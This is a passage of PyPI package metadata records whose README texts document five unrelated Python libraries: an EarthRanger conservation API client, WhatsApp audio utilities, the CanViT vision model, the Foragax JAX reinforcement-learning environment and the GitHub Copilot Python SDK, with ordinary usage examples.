f0083d097d9582f96e833843eb37a037f6b0f17195c316555436931cfe5eece2
f322e227252e7b439d8da4f09b4a88627d648947301a352188e00b8adb9e08e1
AGPL-3.0-only
[ "LICENSE" ]
214
2.4
earthranger-client
1.13.0
Client for EarthRanger API
# EarthRanger Client ## Introduction [EarthRanger](https://www.earthranger.com/) is a software solution that helps protected area managers, ecologists, and wildlife biologists make informed operational decisions for wildlife conservation. The earthranger-client (er-client) is a Python library for accessing the EarthRanger HTTP API. It simplifies interaction with the API by abstracting away the complexity of resource-based endpoints and provides multi-threaded and async capabilities for improved performance. ## Uses of er-client * Extracting data for analysis * Importing ecological or other historical data * Integrating a new field sensor type. If you do, and you will be supporting multiple ER sites, contact us to talk about our Gundi integrations platform * Performing external analysis that results in publishing an Alert on the ER platform. ## Quick Start See `simple-example.py`. ## Installation From PyPI: ``` pip install earthranger-client ``` ## Usage In your code, import the library and create an instance of the client. You must provide `client_id` (e.g. `example_client_id`) for username/password authentication. ``` from erclient import ERClient client = ERClient(service_root="https://sandbox.pamdas.org", client_id="example_client_id", username="", password="") ``` ## Async Support We also offer an async client (asyncio).
Disclaimer: The async client's current capabilities are limited to: * Posting Sensor Observations (a.k.a. Positions) * Posting Events (a.k.a. Reports) * Posting Event Attachments * Posting Camera Trap Reports * Getting Event Types * Getting Events * Getting Observations * Getting Subject Groups * Getting Feature Groups * Getting Sources * Getting Source Assignments (a.k.a. SubjectSource resources) ``` from erclient import AsyncERClient # You can use it as an async context-managed client async with AsyncERClient(service_root="https://sandbox.pamdas.org", client_id="example_client_id", username="", password="") as client: await client.post_sensor_observation(position) await client.post_report(report) await client.post_camera_trap_report(camera_trap_payload, file) ... async with AsyncERClient(service_root="https://sandbox.pamdas.org", client_id="example_client_id", username="", password="") as client: async for observation in client.get_observations(start="2023-11-10T00:00:00-06:00"): print(observation) ... # Or create an instance and close the client explicitly later client = AsyncERClient(service_root="https://sandbox.pamdas.org", client_id="example_client_id", username="", password="") await client.post_sensor_observation(position) await client.post_report(report) await client.post_camera_trap_report(camera_trap_payload, file) ... await client.close() # Close the session used to send requests to ER API ```
text/markdown
null
EarthRanger <opensource@earthranger.com>
null
null
Apache-2.0
EarthRanger, api
[ "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", ...
[]
null
null
>=3.8
[]
[]
[]
[ "dateparser>=1.1.1", "gpxpy>=1.5.0", "httpx>=0.23.3", "importlib-metadata; python_version < \"3.8\"", "pydantic>=1.10.17", "pytz>=2021.1", "requests>=2.28.0", "anyio; extra == \"test\"", "pytest-asyncio; extra == \"test\"", "pytest-mock; extra == \"test\"", "pytest>=8; extra == \"test\"", "res...
[]
[]
[]
[ "Homepage, http://github.com/PADAS/er-client" ]
uv/0.8.15
2026-02-19T22:04:50.358760
earthranger_client-1.13.0.tar.gz
318,454
2f/e0/6ee4bd8712fdb88e87679ce386e7996c497690ad07678e6c730cb9e97035/earthranger_client-1.13.0.tar.gz
source
sdist
null
false
48af64277f01be091cbc92213b8713ce
1b3085cdd9802a8eabea3f953d51bee42ffc5c7df04bd688a71d7b8400cabdab
2fe06ee4bd8712fdb88e87679ce386e7996c497690ad07678e6c730cb9e97035
null
[ "LICENSE" ]
262
2.4
nifigen
2.2.0
nifigen
# WhatsApp Utils A Python package for handling WhatsApp audio messages with Azure AI services integration. ## Features - Send and receive WhatsApp audio messages - Speech-to-text conversion using Azure Cognitive Services - Text-to-speech conversion using Azure Cognitive Services - AI-powered responses using Azure OpenAI ## Installation ```bash python -m build pip install whatsapp_utilsFAPI ```
text/markdown
nifigen
null
null
null
MIT
null
[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent" ]
[]
null
null
>=3.11
[]
[]
[]
[]
[]
[]
[]
[]
twine/6.2.0 CPython/3.12.10
2026-02-19T22:04:05.935771
nifigen-2.2.0-py3-none-any.whl
57,348
5f/a6/8bd7e5d6c45284a04d4a0da6cd695f445197e23cbd64812729c231cd0e4e/nifigen-2.2.0-py3-none-any.whl
py3
bdist_wheel
null
false
c59fc9e4223c4db4e5af62f703ab2d58
7cb8105e742a33aee51ed4c2398e7ebb2580573e229f87922b14f14d21269338
5fa68bd7e5d6c45284a04d4a0da6cd695f445197e23cbd64812729c231cd0e4e
null
[ "LICENSE" ]
93
2.4
canvit-pytorch
0.1.3
CanViT (Canvas Vision Transformer) -- PyTorch
# CanViT (Canvas Vision Transformer) -- PyTorch

<p align="center">
  <img src="assets/canvas_attention_across_scales.png" alt="Canvas attention across scales — two example trajectories showing glimpses, canvas crops, and full canvas PCA/change maps over multiple timesteps." width="100%">
</p>

**Yohaï-Eliel Berreby, Sabrina Du, Audrey Durand, Suresh Krishna**

Reference PyTorch implementation of CanViT (Canvas Vision Transformer).

_This is an early release. For details, a preprint version of our manuscript "CanViT: Toward Active Vision Foundation Models" will be available in the coming weeks._

---

CanViT is a scalable recurrent architecture for fine-grained vision, and the first **Active Vision Foundation Model (AVFM)**: a foundation model for active vision that is both task-agnostic and policy-agnostic.

CanViT processes scenes through sequences of localized glimpses, integrating observations over time into a persistent scene-wide latent workspace — the **canvas** — via **Canvas Attention**, an efficient asymmetric cross-attention mechanism which is based on Scene-Relative Rotary Position Embeddings and eliminates canvas-side QKVO projections.

CanViT-B is pretrained on 1 billion glimpses taken from 13.5 million ImageNet-21k scenes, via **policy-agnostic passive-to-active dense distillation** from a frozen high-resolution DINOv3 ViT-B teacher, without human annotations.

CanViT's scene-wide output features at each timestep are linearly decodable into dense predictions without post-hoc upscaling; a frozen-weights CanViT-B evaluated with linear probing outperforms all prior dense active vision models by a wide margin on ADE20K scene parsing, at a fraction of the cost, while offering significantly greater flexibility. CanViT generalizes natively across policies, sequence length, glimpse size and canvas size, enabling high-resolution and long-horizon continual pretraining alongside task-specific policy learning.
CanViT enables low-latency high-resolution dense vision, running at hundreds of sequential frames per second on commodity hardware.

## Quickstart

We recommend [`uv`](https://docs.astral.sh/uv/) for dependency management.

```bash
uv add canvit-pytorch
```

```python
from canvit_pytorch import CanViTForPretrainingHFHub, Viewpoint, sample_at_viewpoint
from canvit_pytorch.preprocess import preprocess
from PIL import Image
import torch

# CanViT is integrated with the HuggingFace Hub.
model = CanViTForPretrainingHFHub.from_pretrained(
    "canvit/canvitb16-add-vpe-pretrain-g128px-s512px-in21k-dv3b16-2026-02-02"
).eval()

# Replace with the image of your choice
image = Image.open("test_data/Cat03.jpg").convert("RGB")
image = preprocess(512)(image)
image = image.unsqueeze(0)  # [1, 3, 512, 512]

# CanViT is a recurrent model.
state = model.init_state(batch_size=1, canvas_grid_size=32)

# Let's process a first glimpse: centered, zoomed-out.
# You can use any viewpoint you like, as long as it is within bounds.
# CanViT was trained on viewpoints covering 0.25% to 100%
# of a scene's surface area.
with torch.inference_mode():
    vp = Viewpoint.full_scene(batch_size=1, device=image.device)
    glimpse = sample_at_viewpoint(spatial=image, viewpoint=vp, glimpse_size_px=128)
    out = model(glimpse=glimpse, state=state, viewpoint=vp)

# Let's inspect the structure of what we get back.
# The canvas contains the model's working understanding of
# the scene at any given time, and is linearly decodable
# into dense predictions upon token-wise LayerNorm.
# See `demos/basic.py` for how to visualize the canvas.
canvas_spatial = model.get_spatial(out.state.canvas)  # [1, 1024, 1024]
canvas_spatial = canvas_spatial.unflatten(1, (32, 32))  # [1, 32, 32, 1024] — spatial feature map
out.state.recurrent_cls  # [1, 1, 768] — global CLS token
out.local_patches  # [1, 64, 768] — glimpse patch features

# Now let's do a second glimpse: zoom into the top-left quadrant.
# You can do this repeatedly: CanViT is recurrent with a large but constant-size canvas.
with torch.inference_mode():
    vp2 = Viewpoint(centers=torch.tensor([[-.5, -.5]]), scales=torch.tensor([.5]))
    glimpse2 = sample_at_viewpoint(spatial=image, viewpoint=vp2, glimpse_size_px=128)
    out2 = model(glimpse=glimpse2, state=out.state, viewpoint=vp2)

# You can use CanViT with frozen weights, fine-tune it, learn a policy on top...
# Or pretrain your own; it's fast.
# Start building!
```

For a full demo with classification and PCA visualization:

```bash
git clone https://github.com/m2b3/CanViT-PyTorch.git
cd CanViT-PyTorch
uv run --extra demo python demos/basic.py
```

## Pretrained checkpoints

We release checkpoints on HuggingFace under the [`canvit`](https://huggingface.co/canvit) namespace. The following checkpoints are currently available:

- [`canvit/canvitb16-add-vpe-pretrain-g128px-s512px-in21k-dv3b16-2026-02-02`](https://huggingface.co/canvit/canvitb16-add-vpe-pretrain-g128px-s512px-in21k-dv3b16-2026-02-02)

## Citation

If you use this work, please cite this repository. An updated citation will be available upon preprint release.

```bibtex
@misc{berreby2026canvit,
  title={CanViT: Toward Active Vision Foundation Models},
  author={Berreby, Yoha{\"i}-Eliel and Du, Sabrina and Durand, Audrey and Krishna, Suresh},
  year={2026},
  howpublished={\url{https://github.com/m2b3/CanViT-PyTorch}}
}
```

## Contact

Open an issue in this repository or email me@yberreby.com.

## License

MIT. See [LICENSE.md](LICENSE.md) for details.
text/markdown
null
Yohaï-Eliel Berreby <me@yberreby.com>
null
null
null
null
[]
[]
null
null
>=3.12
[]
[]
[]
[ "huggingface-hub>=1.3.2", "numpy<2.4.0,>=2.2.0", "safetensors>=0.7.0", "torch>=2.9.1", "torchvision>=0.22.1", "dinov3-in1k-probes; extra == \"demo\"", "matplotlib>=3.10.8; extra == \"demo\"", "scikit-learn>=1.7.0; extra == \"demo\"", "timm>=1.0.0; extra == \"demo\"", "tyro>=1.0.3; extra == \"demo\...
[]
[]
[]
[]
uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true}
2026-02-19T22:03:10.769467
canvit_pytorch-0.1.3.tar.gz
95,960
89/ba/6dd1df3a8ca56bfa55f1908d848f91e2814f6c966a340a241611bf8a4da5/canvit_pytorch-0.1.3.tar.gz
source
sdist
null
false
653a86c04a4aafce5cf5d54b233f683a
5738c4691842d1cb308f8289a4ebc93276d9df99517e6ee2e4ab429b21393755
89ba6dd1df3a8ca56bfa55f1908d848f91e2814f6c966a340a241611bf8a4da5
MIT
[ "LICENSE.md" ]
209
2.4
continual-foragax
0.49.0
A continual reinforcement learning benchmark
# foragax

Foragax is a lightweight, JAX-first grid-world environment suite for continual / procedural experiments. It provides a small collection of environment variants (weather, multi-biome, etc.), a registry factory for easy construction, and simple example scripts for plotting and visualization.

This version is a [Gymnax](https://github.com/RobertTLange/gymnax) environment implemented in JAX. The original Forager implementation, written in Numba, is available at [andnp/forager](https://github.com/andnp/forager). In addition to the original features, this implementation includes biomes, visualization, and a weather environment.

Key ideas:

- Functional, JAX-friendly API (explicit PRNG keys, immutable env state objects).
- Multiple observation modalities: object and RGB, as well as aperture-based or full-world observations.
- Customizable biomes.
- Customizable object placement, respawning, and rewards.
- Visualization via RGB rendering and plotting.

## Quickstart

We recommend installing with pip from https://pypi.org/project/continual-foragax/.

```bash
pip install continual-foragax
```

We support Python 3.8 through Python 3.13. The codebase expects JAX and other numeric dependencies. If you don't have JAX installed, see the JAX install instructions for your platform; the project `uv.lock` pins compatible versions.

## Minimal example (from examples)

Use the registry factory to create an environment and run it with JAX-style RNG keys and an explicit environment state.
```python
from foragax.registry import make
import jax

# create env (observation_type is one of: 'object', 'rgb', 'world')
env = make(
    "ForagaxWeather-v1",
    aperture_size=5,
    observation_type="object",
)

# environment parameters and RNG
env_params = env.default_params
key = jax.random.key(0)
key, key_reset = jax.random.split(key)

# reset returns (obs, env_state)
_, env_state = env.reset(key_reset, env_params)

# sampling an action and stepping (functional-style)
key, key_act, key_step = jax.random.split(key, 3)
action = env.action_space(env_params).sample(key_act)
_, next_env_state, reward, done, info = env.step(key_step, env_state, action, env_params)

# rendering supports multiple modes: 'world' and 'aperture'
frame = env.render(env_state, env_params, render_mode="aperture")
```

See `examples/plot.py` and `examples/visualize.py` for runnable scripts that produce a sample plot and saved videos using Gym/Gymnasium helpers.

## Registry and included environments

Use `foragax.registry.make` to construct environments by id. Example environment ids include:

- `ForagaxTwoBiomeSmall-v1` / `-v2` — hand-crafted small multi-biome layouts
- `ForagaxWeather-v1` — small weather-driven two-biome environment used by examples

The `make` factory accepts the following notable kwargs:

- `observation_type`: one of `"object"`, `"rgb"`, or `"world"`.
- `aperture_size`: integer or tuple controlling the agent's local observation aperture.
- `file_index`: used to pick weather locations.

## Custom objects and extensions

The codebase includes an object system for placing items into biomes and controlling behaviour (rewards, respawn / regen behavior, blocking / collectable flags). See `foragax.objects` for the canonical object definitions and helpers like `create_weather_objects` used by the registry.

If you want to add new object classes, follow the examples in `foragax.objects` and add the class into registry configs or construct environments programmatically.
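The functional API above (explicit PRNG keys, immutable state passed in and out) is exactly what allows an environment to be stepped inside `jax.lax.scan` under `jit`. A sketch of that rollout pattern, using a toy stand-in environment (`toy_step`) rather than foragax itself so the snippet is self-contained; the real `env.step` has the same explicit-state shape:

```python
import jax
import jax.numpy as jnp

# Toy stand-in for a foragax env: a pure function
# step(key, state, action) -> (obs, state, reward), with no hidden state.
def toy_step(key, state, action):
    state = state + action              # "move" the agent
    reward = -jnp.abs(state).sum()      # closer to the origin is better
    obs = state
    return obs, state, reward

def rollout(key, init_state, num_steps):
    def body(carry, _):
        key, state = carry
        key, key_act, key_step = jax.random.split(key, 3)
        action = jax.random.randint(key_act, (2,), -1, 2)  # random action in {-1, 0, 1}^2
        _, state, reward = toy_step(key_step, state, action)
        return (key, state), reward

    # lax.scan unrolls the step loop on-device; the carry is (key, state)
    (_, final_state), rewards = jax.lax.scan(body, (key, init_state), None, length=num_steps)
    return final_state, rewards

# num_steps must be static for scan's length, hence static_argnums
jitted_rollout = jax.jit(rollout, static_argnums=2)
final_state, rewards = jitted_rollout(jax.random.key(0), jnp.zeros(2, dtype=jnp.int32), 100)
print(rewards.shape)  # (100,)
```

Swapping `toy_step` for `env.step` (plus `env_params`) gives a fully jitted foragax rollout, since the env state objects are immutable pytrees.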
## Design notes

- JAX-first: RNG keys and immutable env state are passed explicitly, so environments can be stepped inside JIT/pmapped loops if desired.
- Small, composable environment variants are provided through the registry (easy to add more).

## Examples

- `examples/plot.py` — runs a short random policy in `ForagaxWeather-v1` and produces a temperature vs reward plot (saves to `plots/sample_plot.png`).
- `examples/visualize.py` — runs environments at multiple aperture sizes and saves short videos under `videos/` using `save_video`.

## Development

Run unit tests via pytest.

## Acknowledgments

We acknowledge the data providers in the ECA&D project.

Klein Tank, A.M.G. and Coauthors, 2002. Daily dataset of 20th-century surface air temperature and precipitation series for the European Climate Assessment. Int. J. of Climatol., 22, 1441-1453. Data and metadata available at https://www.ecad.eu
text/markdown
null
Steven Tang <stang5@ualberta.ca>
null
null
null
null
[]
[]
null
null
>=3.8
[]
[]
[]
[ "gymnax", "six; python_version < \"3.10\"" ]
[]
[]
[]
[]
uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true}
2026-02-19T22:03:04.792156
continual_foragax-0.49.0.tar.gz
7,737,744
b3/2a/b00da1d664cc6be62b9c289e932620d1da540f8f1082cdc255569f8abd43/continual_foragax-0.49.0.tar.gz
source
sdist
null
false
ee1174f3e383d85ba7af2883e1f4ae67
2149791bba8d67fa112d2731f0408d5a5310ed2daf1038f0537a4654a8fb6421
b32ab00da1d664cc6be62b9c289e932620d1da540f8f1082cdc255569f8abd43
null
[]
198
2.4
github-copilot-sdk
0.1.26rc0
Python SDK for GitHub Copilot CLI
# Copilot Python SDK

Python SDK for programmatic control of GitHub Copilot CLI via JSON-RPC.

> **Note:** This SDK is in technical preview and may change in breaking ways.

## Installation

```bash
pip install -e ".[dev]"
# or
uv pip install -e ".[dev]"
```

## Run the Sample

Try the interactive chat sample (from the repo root):

```bash
cd python/samples
python chat.py
```

## Quick Start

```python
import asyncio
from copilot import CopilotClient

async def main():
    # Create and start client
    client = CopilotClient()
    await client.start()

    # Create a session
    session = await client.create_session({"model": "gpt-5"})

    # Wait for response using session.idle event
    done = asyncio.Event()

    def on_event(event):
        if event.type.value == "assistant.message":
            print(event.data.content)
        elif event.type.value == "session.idle":
            done.set()

    session.on(on_event)

    # Send a message and wait for completion
    await session.send({"prompt": "What is 2+2?"})
    await done.wait()

    # Clean up
    await session.destroy()
    await client.stop()

asyncio.run(main())
```

## Features

- ✅ Full JSON-RPC protocol support
- ✅ stdio and TCP transports
- ✅ Real-time streaming events
- ✅ Session history with `get_messages()`
- ✅ Type hints throughout
- ✅ Async/await native

## API Reference

### CopilotClient

```python
client = CopilotClient({
    "cli_path": "copilot",  # Optional: path to CLI executable
    "cli_url": None,        # Optional: URL of existing server (e.g., "localhost:8080")
    "log_level": "info",    # Optional: log level (default: "info")
    "auto_start": True,     # Optional: auto-start server (default: True)
    "auto_restart": True,   # Optional: auto-restart on crash (default: True)
})

await client.start()

session = await client.create_session({"model": "gpt-5"})

def on_event(event):
    print(f"Event: {event['type']}")

session.on(on_event)

await session.send({"prompt": "Hello!"})
# ... wait for events ...
await session.destroy()
await client.stop()
```

**CopilotClient Options:**

- `cli_path` (str): Path to CLI executable (default: "copilot" or `COPILOT_CLI_PATH` env var)
- `cli_url` (str): URL of existing CLI server (e.g., `"localhost:8080"`, `"http://127.0.0.1:9000"`, or just `"8080"`). When provided, the client will not spawn a CLI process.
- `cwd` (str): Working directory for CLI process
- `port` (int): Server port for TCP mode (default: 0 for random)
- `use_stdio` (bool): Use stdio transport instead of TCP (default: True)
- `log_level` (str): Log level (default: "info")
- `auto_start` (bool): Auto-start server on first use (default: True)
- `auto_restart` (bool): Auto-restart on crash (default: True)
- `github_token` (str): GitHub token for authentication. When provided, takes priority over other auth methods.
- `use_logged_in_user` (bool): Whether to use the logged-in user for authentication (default: True, but False when `github_token` is provided). Cannot be used with `cli_url`.

**SessionConfig Options (for `create_session`):**

- `model` (str): Model to use ("gpt-5", "claude-sonnet-4.5", etc.). **Required when using a custom provider.**
- `reasoning_effort` (str): Reasoning effort level for models that support it ("low", "medium", "high", "xhigh"). Use `list_models()` to check which models support this option.
- `session_id` (str): Custom session ID
- `tools` (list): Custom tools exposed to the CLI
- `system_message` (dict): System message configuration
- `streaming` (bool): Enable streaming delta events
- `provider` (dict): Custom API provider configuration (BYOK). See the [Custom Providers](#custom-providers) section.
- `infinite_sessions` (dict): Automatic context compaction configuration
- `on_user_input_request` (callable): Handler for user input requests from the agent (enables the ask_user tool). See the [User Input Requests](#user-input-requests) section.
- `hooks` (dict): Hook handlers for session lifecycle events. See the [Session Hooks](#session-hooks) section.
**Session Lifecycle Methods:**

```python
# Get the session currently displayed in TUI (TUI+server mode only)
session_id = await client.get_foreground_session_id()

# Request TUI to display a specific session (TUI+server mode only)
await client.set_foreground_session_id("session-123")

# Subscribe to all lifecycle events
def on_lifecycle(event):
    print(f"{event.type}: {event.sessionId}")

unsubscribe = client.on(on_lifecycle)

# Subscribe to a specific event type
unsubscribe = client.on("session.foreground", lambda e: print(f"Foreground: {e.sessionId}"))

# Later, to stop receiving events:
unsubscribe()
```

**Lifecycle Event Types:**

- `session.created` - A new session was created
- `session.deleted` - A session was deleted
- `session.updated` - A session was updated
- `session.foreground` - A session became the foreground session in TUI
- `session.background` - A session is no longer the foreground session

### Tools

Define tools with automatic JSON schema generation using the `@define_tool` decorator and Pydantic models:

```python
from pydantic import BaseModel, Field
from copilot import CopilotClient, define_tool

class LookupIssueParams(BaseModel):
    id: str = Field(description="Issue identifier")

@define_tool(description="Fetch issue details from our tracker")
async def lookup_issue(params: LookupIssueParams) -> str:
    issue = await fetch_issue(params.id)
    return issue.summary

session = await client.create_session({
    "model": "gpt-5",
    "tools": [lookup_issue],
})
```

> **Note:** When using `from __future__ import annotations`, define Pydantic models at module level (not inside functions).
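For intuition about what "automatic JSON schema generation" means here, a decorator like `@define_tool` can read a function's parameter types and emit a JSON schema such as the one shown in the low-level API below. A rough, hypothetical stdlib-only sketch of the idea (the real SDK uses Pydantic's schema generation; `schema_from_signature` and the type mapping are illustrative, not SDK APIs):

```python
import inspect
from typing import get_type_hints

# Illustrative mapping from Python annotations to JSON-schema type names
PY_TO_JSON = {str: "string", int: "integer", float: "number", bool: "boolean"}

def schema_from_signature(fn):
    """Build a JSON-schema-like dict from fn's annotated parameters."""
    hints = get_type_hints(fn)
    hints.pop("return", None)
    props = {name: {"type": PY_TO_JSON[tp]} for name, tp in hints.items()}
    # Parameters without defaults are treated as required
    required = [
        name for name, p in inspect.signature(fn).parameters.items()
        if p.default is inspect.Parameter.empty and name in props
    ]
    return {"type": "object", "properties": props, "required": required}

def lookup_issue(id: str, verbose: bool = False) -> str:
    return f"issue {id}"

schema = schema_from_signature(lookup_issue)
# schema["properties"] -> {"id": {"type": "string"}, "verbose": {"type": "boolean"}}
# schema["required"]   -> ["id"]
```

Pydantic's `model_json_schema()` does the same job with far richer type support (nested models, descriptions via `Field`), which is why the decorator takes a `BaseModel` rather than bare annotations.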
**Low-level API (without Pydantic):**

For users who prefer manual schema definition:

```python
from copilot import CopilotClient, Tool

async def lookup_issue(invocation):
    issue_id = invocation["arguments"]["id"]
    issue = await fetch_issue(issue_id)
    return {
        "textResultForLlm": issue.summary,
        "resultType": "success",
        "sessionLog": f"Fetched issue {issue_id}",
    }

session = await client.create_session({
    "model": "gpt-5",
    "tools": [
        Tool(
            name="lookup_issue",
            description="Fetch issue details from our tracker",
            parameters={
                "type": "object",
                "properties": {
                    "id": {"type": "string", "description": "Issue identifier"},
                },
                "required": ["id"],
            },
            handler=lookup_issue,
        )
    ],
})
```

The SDK automatically handles `tool.call`, executes your handler (sync or async), and responds with the final result when the tool completes.

## Image Support

The SDK supports image attachments via the `attachments` parameter. You can attach images by providing their file path:

```python
await session.send({
    "prompt": "What's in this image?",
    "attachments": [
        {
            "type": "file",
            "path": "/path/to/image.jpg",
        }
    ]
})
```

Supported image formats include JPG, PNG, GIF, and other common image types.
The agent's `view` tool can also read images directly from the filesystem, so you can also ask questions like:

```python
await session.send({"prompt": "What does the most recent jpg in this directory portray?"})
```

## Streaming

Enable streaming to receive assistant response chunks as they're generated:

```python
import asyncio
from copilot import CopilotClient

async def main():
    client = CopilotClient()
    await client.start()

    session = await client.create_session({
        "model": "gpt-5",
        "streaming": True
    })

    # Use asyncio.Event to wait for completion
    done = asyncio.Event()

    def on_event(event):
        if event.type.value == "assistant.message_delta":
            # Streaming message chunk - print incrementally
            delta = event.data.delta_content or ""
            print(delta, end="", flush=True)
        elif event.type.value == "assistant.reasoning_delta":
            # Streaming reasoning chunk (if model supports reasoning)
            delta = event.data.delta_content or ""
            print(delta, end="", flush=True)
        elif event.type.value == "assistant.message":
            # Final message - complete content
            print("\n--- Final message ---")
            print(event.data.content)
        elif event.type.value == "assistant.reasoning":
            # Final reasoning content (if model supports reasoning)
            print("--- Reasoning ---")
            print(event.data.content)
        elif event.type.value == "session.idle":
            # Session finished processing
            done.set()

    session.on(on_event)

    await session.send({"prompt": "Tell me a short story"})
    await done.wait()  # Wait for streaming to complete

    await session.destroy()
    await client.stop()

asyncio.run(main())
```

When `streaming=True`:

- `assistant.message_delta` events are sent with `delta_content` containing incremental text
- `assistant.reasoning_delta` events are sent with `delta_content` for reasoning/chain-of-thought (model-dependent)
- Accumulate `delta_content` values to build the full response progressively
- The final `assistant.message` and `assistant.reasoning` events contain the complete content

Note: `assistant.message` and `assistant.reasoning` (final events) are always sent regardless of the streaming setting.

## Infinite Sessions

By default, sessions use **infinite sessions**, which automatically manage context window limits through background compaction and persist state to a workspace directory.

```python
# Default: infinite sessions enabled with default thresholds
session = await client.create_session({"model": "gpt-5"})

# Access the workspace path for checkpoints and files
print(session.workspace_path)
# => ~/.copilot/session-state/{session_id}/

# Custom thresholds
session = await client.create_session({
    "model": "gpt-5",
    "infinite_sessions": {
        "enabled": True,
        "background_compaction_threshold": 0.80,  # Start compacting at 80% context usage
        "buffer_exhaustion_threshold": 0.95,      # Block at 95% until compaction completes
    },
})

# Disable infinite sessions
session = await client.create_session({
    "model": "gpt-5",
    "infinite_sessions": {"enabled": False},
})
```

When enabled, sessions emit compaction events:

- `session.compaction_start` - Background compaction started
- `session.compaction_complete` - Compaction finished (includes token counts)

## Custom Providers

The SDK supports custom OpenAI-compatible API providers (BYOK - Bring Your Own Key), including local providers like Ollama. When using a custom provider, you must specify the `model` explicitly.
**ProviderConfig fields:**

- `type` (str): Provider type - `"openai"`, `"azure"`, or `"anthropic"` (default: `"openai"`)
- `base_url` (str): API endpoint URL (required)
- `api_key` (str): API key (optional for local providers like Ollama)
- `bearer_token` (str): Bearer token for authentication (takes precedence over `api_key`)
- `wire_api` (str): API format for OpenAI/Azure - `"completions"` or `"responses"` (default: `"completions"`)
- `azure` (dict): Azure-specific options with `api_version` (default: `"2024-10-21"`)

**Example with Ollama:**

```python
session = await client.create_session({
    "model": "deepseek-coder-v2:16b",  # Required when using a custom provider
    "provider": {
        "type": "openai",
        "base_url": "http://localhost:11434/v1",  # Ollama endpoint
        # api_key not required for Ollama
    },
})

await session.send({"prompt": "Hello!"})
```

**Example with a custom OpenAI-compatible API:**

```python
import os

session = await client.create_session({
    "model": "gpt-4",
    "provider": {
        "type": "openai",
        "base_url": "https://my-api.example.com/v1",
        "api_key": os.environ["MY_API_KEY"],
    },
})
```

**Example with Azure OpenAI:**

```python
import os

session = await client.create_session({
    "model": "gpt-4",
    "provider": {
        "type": "azure",  # Must be "azure" for Azure endpoints, NOT "openai"
        "base_url": "https://my-resource.openai.azure.com",  # Just the host, no path
        "api_key": os.environ["AZURE_OPENAI_KEY"],
        "azure": {
            "api_version": "2024-10-21",
        },
    },
})
```

> **Important notes:**
> - When using a custom provider, the `model` parameter is **required**. The SDK will throw an error if no model is specified.
> - For Azure OpenAI endpoints (`*.openai.azure.com`), you **must** use `type: "azure"`, not `type: "openai"`.
> - The `base_url` should be just the host (e.g., `https://my-resource.openai.azure.com`). Do **not** include `/openai/v1` in the URL - the SDK handles path construction automatically.
## User Input Requests

Enable the agent to ask questions to the user using the `ask_user` tool by providing an `on_user_input_request` handler:

```python
async def handle_user_input(request, invocation):
    # request["question"] - The question to ask
    # request.get("choices") - Optional list of choices for multiple choice
    # request.get("allowFreeform", True) - Whether freeform input is allowed
    print(f"Agent asks: {request['question']}")
    if request.get("choices"):
        print(f"Choices: {', '.join(request['choices'])}")

    # Return the user's response
    return {
        "answer": "User's answer here",
        "wasFreeform": True,  # Whether the answer was freeform (not from choices)
    }

session = await client.create_session({
    "model": "gpt-5",
    "on_user_input_request": handle_user_input,
})
```

## Session Hooks

Hook into session lifecycle events by providing handlers in the `hooks` configuration:

```python
async def on_pre_tool_use(input, invocation):
    print(f"About to run tool: {input['toolName']}")
    # Return permission decision and optionally modify args
    return {
        "permissionDecision": "allow",          # "allow", "deny", or "ask"
        "modifiedArgs": input.get("toolArgs"),  # Optionally modify tool arguments
        "additionalContext": "Extra context for the model",
    }

async def on_post_tool_use(input, invocation):
    print(f"Tool {input['toolName']} completed")
    return {
        "additionalContext": "Post-execution notes",
    }

async def on_user_prompt_submitted(input, invocation):
    print(f"User prompt: {input['prompt']}")
    return {
        "modifiedPrompt": input["prompt"],  # Optionally modify the prompt
    }

async def on_session_start(input, invocation):
    print(f"Session started from: {input['source']}")  # "startup", "resume", "new"
    return {
        "additionalContext": "Session initialization context",
    }

async def on_session_end(input, invocation):
    print(f"Session ended: {input['reason']}")

async def on_error_occurred(input, invocation):
    print(f"Error in {input['errorContext']}: {input['error']}")
    return {
        "errorHandling": "retry",  # "retry", "skip", or "abort"
    }

session = await client.create_session({
    "model": "gpt-5",
    "hooks": {
        "on_pre_tool_use": on_pre_tool_use,
        "on_post_tool_use": on_post_tool_use,
        "on_user_prompt_submitted": on_user_prompt_submitted,
        "on_session_start": on_session_start,
        "on_session_end": on_session_end,
        "on_error_occurred": on_error_occurred,
    },
})
```

**Available hooks:**

- `on_pre_tool_use` - Intercept tool calls before execution. Can allow/deny or modify arguments.
- `on_post_tool_use` - Process tool results after execution. Can modify results or add context.
- `on_user_prompt_submitted` - Intercept user prompts. Can modify the prompt before processing.
- `on_session_start` - Run logic when a session starts or resumes.
- `on_session_end` - Cleanup or logging when session ends.
- `on_error_occurred` - Handle errors with retry/skip/abort strategies.

## Requirements

- Python 3.9+
- GitHub Copilot CLI installed and accessible
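The pre-tool-use flow described in the Session Hooks section (handler returns a permission decision and, optionally, modified arguments) can be sketched host-side with plain asyncio. This dispatcher is illustrative only, not the SDK's implementation; `run_tool_call` is a hypothetical name, while the dict keys (`toolName`, `toolArgs`, `permissionDecision`, `modifiedArgs`) mirror the hook contract shown above:

```python
import asyncio

# Illustrative dispatcher (NOT the SDK's implementation): shows how an
# on_pre_tool_use hook's return value can gate and reshape a tool call.
async def run_tool_call(tool_name, tool_args, pre_hook, tools):
    decision = await pre_hook({"toolName": tool_name, "toolArgs": tool_args}, None)
    if decision.get("permissionDecision") == "deny":
        return {"resultType": "denied"}
    # The hook may hand back modified arguments; fall back to the originals
    args = decision.get("modifiedArgs", tool_args)
    result = await tools[tool_name](args)
    return {"resultType": "success", "result": result}

async def on_pre_tool_use(input, invocation):
    # Deny shell commands, allow everything else with args untouched
    if input["toolName"] == "shell":
        return {"permissionDecision": "deny"}
    return {"permissionDecision": "allow", "modifiedArgs": input["toolArgs"]}
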